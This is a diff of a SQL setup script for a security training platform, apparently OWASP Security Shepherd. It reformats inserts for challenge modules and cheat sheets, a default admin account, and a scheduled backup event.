+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('c6841bcc326c4bad3a23cd4fa6391eb9bdb146ed', 'Cross Site Scripting 6', 'cross.site.scripting.6', 'challenge', 'XSS', 'xss', 'c13e42171dbd41a7020852ffdd3399b63a87f5', 'd330dea1acf21886b685184ee222ea8e0a60589c3940afd6ebf433469e997caf', 'open', '185', '95', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe', 'SQL Injection 6', 'sql.injection.6', 'challenge', 'Injection', 'injection', '17f999a8b3fbfde54124d6e94b256a264652e5087b14622e1644c884f8a33f82', 'd0e12e91dafdba4825b261ad5221aae15d28c36c7981222eb59f7fc8d8f212a2', 'open', '186', '95', 1, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('ed732e695b85baca21d80966306a9ab5ec37477f', 'Session Management Challenge 5', 'session.management.challenge.5', 'challenge', 'Session Management', 'session.management', 'a15b8ea0b8a3374a1dedc326dfbe3dbae26', '7aed58f3a00087d56c844ed9474c671f8999680556c127a19ee79fa5d7a132e1', 'open', '205', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('adc845f9624716eefabcc90d172bab4096fa2ac4', 'Failure to Restrict URL Access 3', 'failure.to.restrict.url.access.3', 'challenge', 'Failure to Restrict URL Access', 'failure.to.restrict.url.access', '8c1dbfdc7cad35a116535f76f21e448c6c7c0ebc395be2be80e5690e01adec18', 'e40333fc2c40b8e0169e433366350f55c77b82878329570efa894838980de5b4', 'open', '206', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('9294ba32bdbd680e3260a0315cd98bf6ce8b69bd', 'Session Management Challenge 6', 'session.management.challenge.6', 'challenge', 'Session Management', 'session.management', 'bb0eb566322d6b1f1dff388f5eee9929f6f1f9f5cac9eed266ef6e5053fe08e6', 'b5e1020e3742cf2c0880d4098146c4dde25ebd8ceab51807bad88ff47c316ece', 'open', '207', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('6158a695f20f9286d5f12ff3f4d42678f4a9740c', 'Security Misconfig Cookie Flag', 'security.misconfig.cookie.flag', 'challenge', 'Security Misconfigurations', 'security.misconfigurations', '92755de2ebb012e689caf8bfec629b1e237d23438427499b6bf0d7933f1b8215', 'c4285bbc6734a10897d672c1ed3dd9417e0530a4e0186c27699f54637c7fb5d4', 'open', '208', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('368491877a0318e9a774ba5d648c33cb0165ba1e', 'Session Management Challenge 7', 'session.management.challenge.7', 'challenge', 'Session Management', 'session.management', '9042eeaa8455f71deea31a5a32ae51e71477b1581c3612972902206ac51bb621', '269d55bc0e0ff635dcaeec8533085e5eae5d25e8646dcd4b05009353c9cf9c80', 'open', '209', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('64070f5aec0593962a29a141110b9239d73cd7b3', 'SQL Injection 7', 'sql.injection.7', 'challenge', 'Injection', 'injection', '4637cae3d9b961fdff880d6d5ce4f69e91fe23db0aae7dcd4038e20ed8a287dc', '8c2dd7e9818e5c6a9f8562feefa002dc0e455f0e92c8a46ab0cf519b1547eced', 'open', '210', '110', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('145111e80400e4fd48bd3aa5aca382e9c5640793', 'Insecure Cryptographic Storage Challenge 4', 'insecure.cryptographic.storage.challenge.4', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', '50980917266ce6ec07471f49b1a046ca6a5034eb9261fb44c3ffc4b16931191c', 'b927fc4d8c9f70a78f8b6fc46a0cc18533a88b2363054a1f391fe855954d12f9', 'open', '211', '115', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('7153290d128cfdef5f40742dbaeb129a36ac2340', 'Session Management Challenge 8', 'session.management.challenge.8', 'challenge', 'Session Management', 'session.management', '11d84b0ad628bb6e99e0640ff1791a29a1938609829ef5bdccee92b2bccd2bcd', '714d8601c303bbef8b5cabab60b1060ac41f0d96f53b6ea54705bb1ea4316334', 'open', '215', '115', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('853c98bd070fe0d31f1ec8b4f2ada9d7fd1784c5', 'CSRF 7', 'csrf.7', 'challenge', 'CSRF', 'csrf', '849e1efbb0c1e870d17d32a3e1b18a8836514619146521fbec6623fce67b73e8', '7d79ea2b2a82543d480a63e55ebb8fef3209c5d648b54d1276813cd072815df3', 'open', '235', '120', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('f02ce6bcd0a822d245433533997eaf44379065f4', 'Insecure Cryptographic Storage Home Made Key', 'insecure.cryptographic.storage.home.made.key', 'challenge', 'Insecure Cryptographic Storage', 'insecure.cryptographic.storage', '59A8D9A8020C61B3D76A600F94AJCECEABEDD44DF26874BD070BD07D', '9e5ed059b23632c8801d95621fa52071b2eb211d8c044dde6d2f4b89874a7bc4', 'open', '240', '140', 0, 0);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('df2ac757cc135dcb8ce5ea01f677c74f04b446d6', 'XXE Injection', 'xxe.lessons', 'lesson', 'Injection', 'injection', 'c8c232cd8e3abdfea3fcef24379415a65e00ac197af09e82602e231aa3031879', '57dda1bf9a2ca1c34e04f815491ef40836d9b710179cd19754ec5b3c31f27d1a', 'closed', '55', '30', 1, 1);
+INSERT INTO modules (`moduleId`, `moduleName`, `moduleNameLangPointer`, `moduleType`, `moduleCategory`, `moduleCategoryLangPointer`, `moduleResult`, `moduleHash`, `moduleStatus`, `incrementalRank`, `scoreValue`, `hardcodedKey`, `isUnsafe`) VALUES ('08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', 'XXE Injection 1', 'xxe.injection.1', 'challenge', 'Injection', 'injection', '1016d6dce9f715e9eab4f3a884b3b316cfbba8fb4023c19f34c62bd936d5695b', 'ac8f3f6224b1ea3fb8a0f017aadd0d84013ea2c80e232c980e54dd753700123e', 'closed', '60', '40', 1, 1);
 COMMIT;
 
 -- -----------------------------------------------------
-SELECT "Data for table cheatsheet"
-FROM DUAL;
+SELECT "Data for table cheatsheet" FROM DUAL;
 -- -----------------------------------------------------
-SET AUTOCOMMIT = 0;
+SET AUTOCOMMIT=0;
 USE `core`;
 COMMIT;
 
 COMMIT;
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('1ed105033900e462b26ca0685b00d98f59efcd93', '0dbea4cb5811fff0527184f99bd5034ca9286f11', '2012-02-10 10:11:53',
-        '0dbea4cb5811fff0527184f99bd5034ca9286f11.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('286ac1acdd084193e940e6f56df5457ff05a9fe1', '453d22238401e0bf6f1ff5d45996407e98e45b07', '2012-02-10 10:11:53',
-        '453d22238401e0bf6f1ff5d45996407e98e45b07.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('44a6af94f6f7a16cc92d84a936cb5c7825967b47', 'cd7f70faed73d2457219b951e714ebe5775515d8', '2012-02-10 10:11:53',
-        'cd7f70faed73d2457219b951e714ebe5775515d8.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('5487f2bf98beeb3aea66941ae8257a5e0bec38bd', '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', '2012-02-10 10:11:53',
-        '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('5eccb1b8b1c033bba8ef928089808751cbe6e1f8', '94cd2de560d89ef59fc450ecc647ff4d4a55c15d', '2012-02-10 10:11:53',
-        '94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('6924e936f811e174f206d5432cf7510a270a18fa', 'b70a84f159876bb9885b6e0087d22f0a52abbfcf', '2012-02-10 10:11:53',
-        'b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('7382ff2f7ee416bf0d37961ec54de32c502351de', 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', '2012-02-10 10:11:53',
-        'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('776ef847e16dde4b1d65a476918d2157f62f8c91', '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', '2012-02-10 10:11:53',
-        '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('82c207a4e07cbfc54faec884be6db0524e74829e', '891a0208a95f1791287be721a4b851d4c584880a', '2012-02-10 10:11:53',
-        '891a0208a95f1791287be721a4b851d4c584880a.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('860e5ed692c956c2ae6c4ba20c95313d9f5b0383', 'b6432a6b5022cb044e9946315c44ab262ab59e88', '2012-02-10 10:11:53',
-        'b6432a6b5022cb044e9946315c44ab262ab59e88.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('945b7dcdef1a36ded2ab008422396f8ba51c0630', 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', '2012-02-10 10:11:53',
-        'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('97f946ed0bbda4f85e472321a256eacf2293239d', '20e755179a5840be5503d42bb3711716235005ea', '2012-02-10 10:11:53',
-        '20e755179a5840be5503d42bb3711716235005ea.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('af5959a242047ee87f728b87570a4e9ed9417e5e', '544aa22d3dd16a8232b093848a6523b0712b23da', '2012-02-10 10:11:53',
-        '544aa22d3dd16a8232b093848a6523b0712b23da.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('b8515347017439da4216c6f8d984326eb21652d0', '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', '2012-02-10 10:11:53',
-        '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('b921c6b7dc82648f0a0d07513f3eecb39b3ed064', 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', '2012-02-10 10:11:53',
-        'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('ba4e0a2727561c41286aa850b89022c09e088b67', '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', '2012-02-10 10:11:53',
-        '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('bb94a8412d7bb95f84c73afa420ca57fbc917912', '9533e21e285621a676bec58fc089065dec1f59f5', '2012-02-10 10:11:53',
-        '9533e21e285621a676bec58fc089065dec1f59f5.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('c0b869ff8a4cd1f388e5e6bdd6525d176175c296', '408610f220b4f71f7261207a17055acbffb8a747', '2012-02-10 10:11:53',
-        '408610f220b4f71f7261207a17055acbffb8a747.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('c0ed3f81fc615f28a39ed2c23555cea074e513f0', '0709410108f91314fb6f7721df9b891351eb2fcc', '2012-02-10 10:11:53',
-        '0709410108f91314fb6f7721df9b891351eb2fcc.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('d0a0742494656c79767864b2898247df4f37b728', '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', '2012-02-10 10:11:53',
-        '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('d51277769f9452b6508a3a22d9f52bea3b0ff84d', 'f771a10efb42a79a9dba262fd2be2e44bf40b66d', '2012-02-10 10:11:53',
-        'f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('e7e44ba680b2ab1f6958b1344c9e43931b81164a', '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', '2012-02-10 10:11:53',
-        '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('f392e5a69475b14fbe5ae17639e174f379c0870e', '201ae6f8c55ba3f3b5881806387fbf34b15c30c2', '2012-02-10 10:11:53',
-        '201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('6afa50948e10466e9a94c7c2b270b3f958e412c6', '82e8e9e2941a06852b90c97087309b067aeb2c4c', '2012-02-10 10:11:53',
-        '82e8e9e2941a06852b90c97087309b067aeb2c4c.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('c424a4c7012ac39a4aef70f15f51ecc8fa209411', 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6', '2020-02-11 10:11:53',
-        'df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution');
-INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`)
-VALUES ('e6ce51d31070bef895bf9763caeff78a0c7c2cc9', '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', '2020-10-09 10:11:53',
-        '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('1ed105033900e462b26ca0685b00d98f59efcd93', '0dbea4cb5811fff0527184f99bd5034ca9286f11', '2012-02-10 10:11:53', '0dbea4cb5811fff0527184f99bd5034ca9286f11.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('286ac1acdd084193e940e6f56df5457ff05a9fe1', '453d22238401e0bf6f1ff5d45996407e98e45b07', '2012-02-10 10:11:53', '453d22238401e0bf6f1ff5d45996407e98e45b07.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('44a6af94f6f7a16cc92d84a936cb5c7825967b47', 'cd7f70faed73d2457219b951e714ebe5775515d8', '2012-02-10 10:11:53', 'cd7f70faed73d2457219b951e714ebe5775515d8.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('5487f2bf98beeb3aea66941ae8257a5e0bec38bd', '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4', '2012-02-10 10:11:53', '2dc909fd89c2b03059b1512e7b54ce5d1aaa4bb4.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('5eccb1b8b1c033bba8ef928089808751cbe6e1f8', '94cd2de560d89ef59fc450ecc647ff4d4a55c15d', '2012-02-10 10:11:53', '94cd2de560d89ef59fc450ecc647ff4d4a55c15d.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('6924e936f811e174f206d5432cf7510a270a18fa', 'b70a84f159876bb9885b6e0087d22f0a52abbfcf', '2012-02-10 10:11:53', 'b70a84f159876bb9885b6e0087d22f0a52abbfcf.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('7382ff2f7ee416bf0d37961ec54de32c502351de', 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d', '2012-02-10 10:11:53', 'a4bf43f2ba5ced041b03d0b3f9fa3541c520d65d.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('776ef847e16dde4b1d65a476918d2157f62f8c91', '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6', '2012-02-10 10:11:53', '5ca9115f3279b9b9f3308eb6a59a4fcd374846d6.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('82c207a4e07cbfc54faec884be6db0524e74829e', '891a0208a95f1791287be721a4b851d4c584880a', '2012-02-10 10:11:53', '891a0208a95f1791287be721a4b851d4c584880a.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('860e5ed692c956c2ae6c4ba20c95313d9f5b0383', 'b6432a6b5022cb044e9946315c44ab262ab59e88', '2012-02-10 10:11:53', 'b6432a6b5022cb044e9946315c44ab262ab59e88.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('945b7dcdef1a36ded2ab008422396f8ba51c0630', 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b', '2012-02-10 10:11:53', 'd4e2c37d8f1298fcaf4edcea7292cb76e9eab09b.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('97f946ed0bbda4f85e472321a256eacf2293239d', '20e755179a5840be5503d42bb3711716235005ea', '2012-02-10 10:11:53', '20e755179a5840be5503d42bb3711716235005ea.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('af5959a242047ee87f728b87570a4e9ed9417e5e', '544aa22d3dd16a8232b093848a6523b0712b23da', '2012-02-10 10:11:53', '544aa22d3dd16a8232b093848a6523b0712b23da.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('b8515347017439da4216c6f8d984326eb21652d0', '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a', '2012-02-10 10:11:53', '52c5394cdedfb2e95b3ad8b92d0d6c9d1370ea9a.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('b921c6b7dc82648f0a0d07513f3eecb39b3ed064', 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07', '2012-02-10 10:11:53', 'ca8233e0398ecfa76f9e05a49d49f4a7ba390d07.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('ba4e0a2727561c41286aa850b89022c09e088b67', '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e', '2012-02-10 10:11:53', '0e9e650ffca2d1fe516c5d7b0ce5c32de9e53d1e.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('bb94a8412d7bb95f84c73afa420ca57fbc917912', '9533e21e285621a676bec58fc089065dec1f59f5', '2012-02-10 10:11:53', '9533e21e285621a676bec58fc089065dec1f59f5.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('c0b869ff8a4cd1f388e5e6bdd6525d176175c296', '408610f220b4f71f7261207a17055acbffb8a747', '2012-02-10 10:11:53', '408610f220b4f71f7261207a17055acbffb8a747.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('c0ed3f81fc615f28a39ed2c23555cea074e513f0', '0709410108f91314fb6f7721df9b891351eb2fcc', '2012-02-10 10:11:53', '0709410108f91314fb6f7721df9b891351eb2fcc.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('d0a0742494656c79767864b2898247df4f37b728', '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342', '2012-02-10 10:11:53', '6319a2e38cc4b2dc9e6d840e1b81db11ee8e5342.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('d51277769f9452b6508a3a22d9f52bea3b0ff84d', 'f771a10efb42a79a9dba262fd2be2e44bf40b66d', '2012-02-10 10:11:53', 'f771a10efb42a79a9dba262fd2be2e44bf40b66d.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('e7e44ba680b2ab1f6958b1344c9e43931b81164a', '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e', '2012-02-10 10:11:53', '5dda8dc216bd6a46fccaa4ed45d49404cdc1c82e.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('f392e5a69475b14fbe5ae17639e174f379c0870e', '201ae6f8c55ba3f3b5881806387fbf34b15c30c2', '2012-02-10 10:11:53', '201ae6f8c55ba3f3b5881806387fbf34b15c30c2.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('6afa50948e10466e9a94c7c2b270b3f958e412c6', '82e8e9e2941a06852b90c97087309b067aeb2c4c', '2012-02-10 10:11:53', '82e8e9e2941a06852b90c97087309b067aeb2c4c.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('c424a4c7012ac39a4aef70f15f51ecc8fa209411', 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6', '2020-02-11 10:11:53', 'df2ac757cc135dcb8ce5ea01f677c74f04b446d6.solution');
+INSERT INTO `core`.`cheatsheet` (`cheatSheetId`, `moduleId`, `createDate`, `solution`) VALUES ('e6ce51d31070bef895bf9763caeff78a0c7c2cc9', '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae', '2020-10-09 10:11:53', '08b3dffd4b837ebe53d52e53b5bbbabf4a4ca9ae.solution');
 CALL cheatSheetCreate('a84bbf8737a9ca749d81d5226fc87e0c828138ee', 'a84bbf8737a9ca749d81d5226fc87e0c828138ee.solution');
 CALL cheatSheetCreate('e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998', 'e0ba96bb4c8d4cd2e1ff0a10a0c82b5362edf998.solution');
 CALL cheatSheetCreate('ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe', 'ad332a32a6af1f005f9c8d1e98db264eb2ae5dfe.solution');
@@ -2506,14 +1742,11 @@ COMMIT;
 
 -- Default admin user
 
-call userCreate(null, 'admin',
-                '$argon2i$v=19$m=65536,t=10,p=1$7oxgR8QkdOd4tsHFieFKrw$eOy0TCxhY1bQIAbLQcLr9Sz2+4q9DhPTz1frsytgtTk',
-                'admin', null, 'admin@securityShepherd.org', 'login', true, false);
+call userCreate(null, 'admin', '$argon2i$v=19$m=65536,t=10,p=1$7oxgR8QkdOd4tsHFieFKrw$eOy0TCxhY1bQIAbLQcLr9Sz2+4q9DhPTz1frsytgtTk', 'admin', null, 'admin@securityShepherd.org', 'login', true, false);
 
 -- Enable backup script
 
-SELECT "Creating BackUp Schema"
-FROM DUAL;
+SELECT "Creating BackUp Schema" FROM DUAL;
 
 DROP DATABASE IF EXISTS backup;
 CREATE DATABASE backup;
@@ -2529,148 +1762,138 @@ USE core;
 drop event IF EXISTS update_status;
 
 create event update_status
-    on schedule every 1 minute
-    do
-    BEGIN
-
-        SET @OLD_UNIQUE_CHECKS = @@UNIQUE_CHECKS, UNIQUE_CHECKS = 0;
-        SET @OLD_FOREIGN_KEY_CHECKS = @@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS = 0;
-        SET @OLD_SQL_MODE = @@SQL_MODE, SQL_MODE = 'TRADITIONAL';
-
-        drop table IF EXISTS `backup`.`users`;
-        drop table IF EXISTS `backup`.`class`;
-        drop table IF EXISTS `backup`.`modules`;
-        drop table IF EXISTS `backup`.`results`;
-        drop table IF EXISTS `backup`.`cheatsheet`;
-        drop table IF EXISTS `backup`.`sequence`;
-        -- -----------------------------------------------------
+on schedule every 1 minute
+do
+
+BEGIN
+
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+
+drop table IF EXISTS `backup`.`users`;
+drop table IF EXISTS `backup`.`class`;
+drop table IF EXISTS `backup`.`modules`;
+drop table IF EXISTS `backup`.`results`;
+drop table IF EXISTS `backup`.`cheatsheet`;
+drop table IF EXISTS `backup`.`sequence`;
+-- -----------------------------------------------------
 -- Table `core`.`class`
 -- -----------------------------------------------------
-        CREATE TABLE IF NOT EXISTS `backup`.`class`
-        (
-            `classId`   VARCHAR(64) NOT NULL,
-            `className` VARCHAR(32) NOT NULL,
-            `classYear` VARCHAR(5)  NOT NULL,
-            PRIMARY KEY (`classId`)
-        )
-            ENGINE = InnoDB;
+CREATE  TABLE IF NOT EXISTS `backup`.`class` (
+  `classId` VARCHAR(64) NOT NULL ,
+  `className` VARCHAR(32) NOT NULL ,
+  `classYear` VARCHAR(5) NOT NULL ,
+  PRIMARY KEY (`classId`) )
+ENGINE = InnoDB;
 
-        -- -----------------------------------------------------
+-- -----------------------------------------------------
 -- Table `core`.`users`
 -- -----------------------------------------------------
-        CREATE TABLE IF NOT EXISTS `backup`.`users`
-        (
-            `userId`         VARCHAR(64)  NOT NULL,
-            `classId`        VARCHAR(64)  NULL,
-            `userName`       VARCHAR(32)  NOT NULL,
-            `userPass`       VARCHAR(191) NOT NULL,
-            `userRole`       VARCHAR(32)  NOT NULL,
-            `badLoginCount`  INT          NOT NULL DEFAULT 0,
-            `suspendedUntil` DATETIME     NOT NULL DEFAULT '1000-01-01 00:00:00',
-            `userAddress`    VARCHAR(128) NULL,
